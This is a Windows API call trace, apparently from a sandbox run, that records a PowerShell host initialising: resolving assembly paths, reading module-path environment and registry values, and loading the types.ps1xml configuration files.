	[0465.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0466.860] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0466.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.861] CoTaskMemFree (pv=0x1b39cff0) 
	[0466.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d4
	[0466.878] CoCreateGuid (in: pguid=0x22dfd0 | out: pguid=0x22dfd0*(Data1=0xc79ba23f, Data2=0xa014, Data3=0x47cd, Data4=([0]=0xb5, [1]=0xbf, [2]=0x92, [3]=0xf, [4]=0xe8, [5]=0x74, [6]=0x62, [7]=0xed))) returned 0x0
	[0466.879] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0466.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.880] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.863] WinSqmIsOptedIn () returned 0x0
	[0467.864] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.864] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.864] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.865] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.865] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.865] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.866] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.866] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.866] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.866] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.866] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.866] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.867] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.867] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.868] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.868] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.868] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.868] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.877] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.877] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.892] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.892] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.893] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.893] CoTaskMemFree (pv=0x1b39cff0) 
	[0467.893] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0467.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.893] CoTaskMemFree (pv=0x1b39cff0) 
	[0469.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0469.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0469.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0469.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.066] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0470.066] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0470.066] CoTaskMemFree (pv=0x1b39cff0) 
	[0470.068] CoTaskMemAlloc (cb=0xcc) returned 0x1b39b2c0
	[0470.068] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b39b2c0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0470.068] CoTaskMemFree (pv=0x1b39b2c0) 
	[0470.068] CoTaskMemAlloc (cb=0xf0) returned 0x1b396fe0
	[0470.068] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b396fe0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0470.068] CoTaskMemFree (pv=0x1b396fe0) 
	[0470.068] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22db48 | out: phkResult=0x22db48*=0x330) returned 0x0
	[0470.068] RegQueryValueExW (in: hKey=0x330, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22dacc, lpData=0x0, lpcbData=0x22dac8*=0x0 | out: lpType=0x22dacc*=0x2, lpData=0x0, lpcbData=0x22dac8*=0x6c) returned 0x0
	[0470.068] CoTaskMemAlloc (cb=0x70) returned 0x3c41f0
	[0470.068] RegQueryValueExW (in: hKey=0x330, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22da9c, lpData=0x3c41f0, lpcbData=0x22da98*=0x6c | out: lpType=0x22da9c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x22da98*=0x6c) returned 0x0
	[0470.069] CoTaskMemFree (pv=0x3c41f0) 
	[0470.069] CoTaskMemAlloc (cb=0xcc) returned 0x1b39b2c0
	[0470.069] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b39b2c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0470.069] CoTaskMemFree (pv=0x1b39b2c0) 
	[0470.069] CoTaskMemAlloc (cb=0xcc) returned 0x1b39b2c0
	[0470.069] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b39b2c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0470.069] CoTaskMemFree (pv=0x1b39b2c0) 
	[0470.073] RegCloseKey (hKey=0x330) returned 0x0
	[0470.073] CoTaskMemAlloc (cb=0xcc) returned 0x1b39b2c0
	[0470.073] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b39b2c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0470.073] CoTaskMemFree (pv=0x1b39b2c0) 
	[0470.073] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22db48 | out: phkResult=0x22db48*=0x330) returned 0x0
	[0470.073] RegQueryValueExW (in: hKey=0x330, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22dacc, lpData=0x0, lpcbData=0x22dac8*=0x0 | out: lpType=0x22dacc*=0x0, lpData=0x0, lpcbData=0x22dac8*=0x0) returned 0x2
	[0470.073] RegCloseKey (hKey=0x330) returned 0x0
	[0470.081] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0470.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.081] CoTaskMemFree (pv=0x1b39cff0) 
	[0470.083] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0470.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.083] CoTaskMemFree (pv=0x1b39cff0) 
	[0470.092] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0470.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.092] CoTaskMemFree (pv=0x1b39cff0) 
	[0470.093] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0470.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.093] CoTaskMemFree (pv=0x1b39cff0) 
	[0470.360] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d938 | out: phkResult=0x22d938*=0x330) returned 0x0
	[0470.361] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x22d94c, lpData=0x0, lpcbData=0x22d948*=0x0 | out: lpType=0x22d94c*=0x1, lpData=0x0, lpcbData=0x22d948*=0x74) returned 0x0
	[0470.361] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x22d8bc, lpData=0x0, lpcbData=0x22d8b8*=0x0 | out: lpType=0x22d8bc*=0x1, lpData=0x0, lpcbData=0x22d8b8*=0x74) returned 0x0
	[0470.361] CoTaskMemAlloc (cb=0x78) returned 0x3c41f0
	[0470.361] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x22d88c, lpData=0x3c41f0, lpcbData=0x22d888*=0x74 | out: lpType=0x22d88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22d888*=0x74) returned 0x0
	[0470.361] CoTaskMemFree (pv=0x3c41f0) 
	[0470.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0470.361] SetErrorMode (uMode=0x1) returned 0x1
	[0470.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22d810 | out: lpFileInformation=0x22d810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0470.361] SetErrorMode (uMode=0x1) returned 0x1
	[0470.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0470.362] SetErrorMode (uMode=0x1) returned 0x1
	[0470.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d810 | out: lpFileInformation=0x22d810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0470.362] SetErrorMode (uMode=0x1) returned 0x1
	[0470.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0470.367] SetErrorMode (uMode=0x1) returned 0x1
	[0470.367] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d810 | out: lpFileInformation=0x22d810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0470.367] SetErrorMode (uMode=0x1) returned 0x1
	[0470.371] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0470.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.371] CoTaskMemFree (pv=0x1b39cff0) 
	[0470.378] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0470.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.379] CoTaskMemFree (pv=0x1b39cff0) 
	[0470.380] GetACP () returned 0x4e4
	[0470.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0470.388] SetErrorMode (uMode=0x1) returned 0x1
	[0470.388] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0470.389] GetFileType (hFile=0x338) returned 0x1
	[0470.389] SetErrorMode (uMode=0x1) returned 0x1
	[0470.389] GetFileType (hFile=0x338) returned 0x1
	[0470.390] ReadFile (in: hFile=0x338, lpBuffer=0x2caea18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2caea18*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0470.393] ReadFile (in: hFile=0x338, lpBuffer=0x2caea18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2caea18*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0470.393] ReadFile (in: hFile=0x338, lpBuffer=0x2caea18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2caea18*, lpNumberOfBytesRead=0x22d748*=0x1000, lpOverlapped=0x0) returned 1
	[0470.394] ReadFile (in: hFile=0x338, lpBuffer=0x2caea18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2caea18*, lpNumberOfBytesRead=0x22d748*=0xcf3, lpOverlapped=0x0) returned 1
	[0470.394] ReadFile (in: hFile=0x338, lpBuffer=0x2cade73, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2cade73*, lpNumberOfBytesRead=0x22d748*=0x0, lpOverlapped=0x0) returned 1
	[0470.394] ReadFile (in: hFile=0x338, lpBuffer=0x2caea18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d748, lpOverlapped=0x0 | out: lpBuffer=0x2caea18*, lpNumberOfBytesRead=0x22d748*=0x0, lpOverlapped=0x0) returned 1
	[0470.396] CloseHandle (hObject=0x338) returned 1
	[0470.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0470.401] SetErrorMode (uMode=0x1) returned 0x1
